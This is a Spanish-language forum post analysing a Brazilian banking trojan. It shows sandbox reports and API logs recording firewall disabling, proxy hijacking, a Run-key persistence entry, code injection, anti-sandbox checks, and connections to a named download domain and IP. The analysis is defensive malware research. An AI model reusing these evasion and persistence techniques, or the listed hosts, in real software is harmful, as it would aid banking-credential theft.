Transfered files from and/or to internet

Código:
 Report generated with Buster Sandbox Analyzer 1.85 at 12:31:20 on 08/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe

 [ Changes to filesystem ]
   * Creates file C:\WINDOWS\winsa64.cfg
   * Creates file C:\WINDOWS\winsa64.exe
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp
   * Modifies file C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat
   * Modifies file C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat
   * Modifies file C:\Documents and Settings\r32\Cookies\index.dat

 [ Changes to registry ]
   * Modifies value "NumberOfCrashes=00000003" in key HKEY_LOCAL_MACHINE\software\microsoft\DrWatson
          old value "NumberOfCrashes=00000002"
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
   * Creates value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile
   * Modifies value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
          old value empty
   * Empties value "EnableFirewall" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
         old value "EnableFirewall=00000001"
   * Modifies value "ProxyEnable=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
          old value empty
   * Creates value "ProxyServer=3100320037002E0030002E0030002E0031003A0039003600360036000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
                    binary data=127.0.0.1:9666
   * Modifies value "ProxyOverride=3100320037002E0030002E0030002E0031000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
                       binary data=127.0.0.1
          old value "ProxyOverride=6C006F00630061006C000000"
                       binary data=local
   * Creates Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013020720130208
   * Creates Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013020820130209
   * Modifies value "SavedLegacySettings=46000000B9010000030000000E0000003132372E302E302E313A39363636090000003132372E302E302E3100000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
          old value "SavedLegacySettings=46000000BA0100000100000000000000050000006C6F63616C00000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000"
   * Creates value "winsa64=43003A005C00570049004E0044004F00570053005C00770069006E0073006100360034002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Run
                binary data=C:\WINDOWS\winsa64.exe

 [ Network services ]
   * Looks for an Internet connection.
   * Queries DNS "www.cadastramento.net".
   * Queries DNS "www.chabvf.info".
   * Queries DNS "www.yoeqtxutb.info".
   * Queries DNS "www.itjdcryfa.info".
   * Queries DNS "solutionfinder.microsoft.com".
   * Queries DNS "s3.amazonaws.com".
   * Queries DNS "google.es".
   * Queries DNS "www3.nationalgeographic.com".
   * Queries DNS "google.bg".
   * Queries DNS "google.net".
   * Queries DNS "google.co.uk".
   * Queries DNS "google.kz".
   * Queries DNS "google.pt".
   * Queries DNS "google.by".
   * C:\WINDOWS\winsa64.exe Connects to "212.1.208.24" on port 80 (TCP - HTTP).
   * Downloads file from "www.cadastramento.net/sistema.html".

 [ Process/window/string information ]
   * Enables process privileges.
   * Gets user name information.
   * Gets system default language ID.
   * Gets computer name.
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Anti-Malware Analyzer routine: WinDbg detection.
   * Anti-Malware Analyzer routine: Sandboxie detection.
   * Creates an event named "ShellCopyEngineRunning".
   * Creates an event named "ShellCopyEngineFinished".
   * Creates a mutex "INSONIA".
   * Creates a mutex "HxD{73025671-91B6-473C-B0EE-6EAB6FD0E6DE}".
   * Creates a mutex "MSCTF.Shared.MUTEX.EBH".
   * Opens a service named "AudioSrv".
   * Creates a mutex "MidiMapper_modLongMessage_RefCnt".
   * Creates a mutex "MidiMapper_Configure".
   * Enumerates running processes.
   * Creates process "(null),C:\WINDOWS\system32\dwwin.exe -x -s 456,C:\WINDOWS\system32".
   * Injects code into process "c:\windows\system32\dwwin.exe".
   * Creates a mutex "SHIMLIB_LOG_MUTEX".
   * Creates a mutex "Local\_!MSFTHISTORY!_".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!".
   * Creates a mutex "Local\c:!documents and settings!r32!cookies!".
   * Creates a mutex "Local\c:!documents and settings!r32!configuración local!historial!history.ie5!".
   * Creates a mutex "RasPbFile".
   * Lists all entry names in a remote access phone book.
   * Opens a service named "RASMAN".
   * Opens a service named "Sens".
   * Injects code into process "c:\windows\system32\drwtsn32.exe".
   * Creates an event named "DbgEngEvent_00000550".
   * Injects code into process "c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe".
   * Terminates process "à?¤\dee\harskvol1\do".
   * Contains string Anubis detection routine found ("76487-337-8429955-22614")
   * Contains string Sandboxie detection routine found ("SbieDll.dll")

Timers:





Captura de los certificados válidos para los siguente bancos de Brasil:





Conexión con servidor (independientemente del explorador...):



El archivo "mario.php" estaba vacio, ni iframe ni código:



Buscando archivos en su servidor encuentro este html, con refréncia a dos bancos:




Podría haber sacado mucha más información si lo hubiese ejecutado en máquina real, aborta conexiones y creación de algunos archivos en preséncia de entorno virtual.
879  Seguridad Informática / Análisis y Diseño de Malware / Re: Troyano bancario II (diferente configuración). en: 16 Febrero 2013, 14:40 pm
Análisis del archivo "projeto.exe":

Código:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\Projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ResumeThread() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(Projeto.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(dbghelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(SbieDll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(wsock32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateEvent(ShellCopyEngineRunning) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(EXPLORER.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(setupapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetComputerName() [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateEvent(ShellCopyEngineFinished) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
CreateProcess((null),C:\WINDOWS\winsa64.exe,C:\WINDOWS) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(winlogon.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(advapi32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\apphelp.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
WriteProcessMemory(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ExitProcess(0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
Executing: c:\windows\winsa64.exe
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,103000,PAGE_READWRITE) [c:\windows\winsa64.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(kernel32.dll) [c:\windows\winsa64.exe]
LoadLibrary(user32.dll) [c:\windows\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(oleaut32.dll) [c:\windows\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\windows\winsa64.exe]
LoadLibrary(ole32.dll) [c:\windows\winsa64.exe]
LoadLibrary(version.dll) [c:\windows\winsa64.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(gdi32.dll) [c:\windows\winsa64.exe]
LoadLibrary(wininet.dll) [c:\windows\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\windows\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\windows\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\windows\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\windows\winsa64.exe]
LoadLibrary(lz32.dll) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_READWRITE) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_READWRITE) [c:\windows\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\windows\winsa64.exe]
VirtualQueryEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(Kernel32) [c:\windows\winsa64.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\winsa64.exe]
OpenProcessToken(C:\WINDOWS\winsa64.exe) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\winsa64.exe]
OpenProcess(jsobs.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
ResumeThread() [c:\windows\winsa64.exe]
OpenProcess(PE Explorer (portable).exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(idag.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
GetModuleHandle(Advapi32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\windows\winsa64.exe]
OpenProcess(winsa64.exe) [c:\windows\winsa64.exe]
GetModuleHandle(USER32) [c:\windows\winsa64.exe]
LoadLibrary(imm32.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\winsa64.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
OpenProcess(EvO_DBG.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_RESERVE,PAGE_NOACCESS) [c:\windows\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\windows\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\windows\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\windows\winsa64.exe]
IsDebuggerPresent() [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\windows\winsa64.exe]
BitBlt() [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\windows\winsa64.exe]
VirtualAllocEx(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe,MEM_COMMIT,PAGE_EXECUTE_READWRITE) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\windows\winsa64.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\windows\winsa64.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\windows\winsa64.exe]
GetModuleHandle(version.dll) [c:\windows\winsa64.exe]
FreeLibrary() [c:\windows\winsa64.exe]
OpenMutex(ShimCacheMutex) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\windows\winsa64.exe]
GetModuleHandle(dbghelp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(SbieDll.dll) [c:\windows\winsa64.exe]
LoadLibrary(wsock32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2_32.dll) [c:\windows\winsa64.exe]
LoadLibrary(ws2help.dll) [c:\windows\winsa64.exe]
LoadLibrary(shell32.dll) [c:\windows\winsa64.exe]
CreateMutex(INSONIA) [c:\windows\winsa64.exe]
CreateFile(C:\WINDOWS\winsa64.cfg) [c:\windows\winsa64.exe]
Sleep(100) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\mswsock.dll) [c:\windows\winsa64.exe]
LoadLibrary(hnetcfg.dll) [c:\windows\winsa64.exe]
LoadLibrary(rpcrt4.dll) [c:\windows\winsa64.exe]
LoadLibrary(c:\windows\system32\wshtcpip.dll) [c:\windows\winsa64.exe]
LoadLibrary(dnsapi.dll) [c:\windows\winsa64.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\projeto.exe]
LoadLibrary(c:\windows\system32\winrnr.dll) [c:\windows\winsa64.exe]
LoadLibrary(wldap32.dll) [c:\windows\winsa64.exe]
LoadLibrary(rasadhlp.dll) [c:\windows\winsa64.exe]
GetModuleHandle(ws2_32.dll) [c:\windows\winsa64.exe]
connect( 212.1.208.24:80 ) [c:\windows\winsa64.exe]
DeleteFile(C:\WINDOWS\a.exe) [c:\windows\winsa64.exe]
Sleep(60000000) [c:\windows\winsa64.exe]

Descarga dos archivos, "winsa64.exe" y el archivo "winsa64.cfg" que contiene el dominio no-ip asociado:



Análisis del archivo "winsa64.exe" (Api Log):

Código:
Executing: c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
VirtualQueryEx(c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcessToken(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
ResumeThread() [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
OpenProcess(winsa64.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe]
